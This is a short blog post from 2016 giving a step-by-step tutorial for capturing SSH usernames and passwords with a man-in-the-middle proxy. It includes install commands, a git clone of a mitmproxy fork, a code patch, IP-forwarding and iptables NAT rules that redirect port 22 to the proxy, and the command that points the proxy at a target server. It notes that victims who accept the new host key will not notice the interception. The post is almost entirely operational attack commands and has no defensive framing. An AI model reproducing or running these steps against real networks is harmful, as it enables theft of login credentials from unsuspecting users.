Tuesday, October 25, 2016

intercept username and password using ssh mitm (man in the middle)

*** setup information
-diagram
client --> mitmproxy --> ssh server

- target server ip: 192.168.202.124


1- install dependency packages
$ sudo pip install twisted
$ sudo  apt-get install python-service-identity
$ pip install pycrypto

2- download the mitmproxy
$ git clone https://github.com/saironiq/mitmproxy.git

3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so
- modify file mitmproxy/mitmproxy/sshdebug.py
  -- line 655 modify it to below
mpints.append(cnumber.bytes_to_long(
  -- line 11 add the following line
from Crypto.Util import number as cnumber

4- generate keys
$ cd  mitmproxy
$ sudo ./mitmproxy

5- update ip_forward rule and nat
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

6- run the mitmproxy_ssh and point to target server 192.168.202.124
$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s

7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client

- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124

No comments:

Post a Comment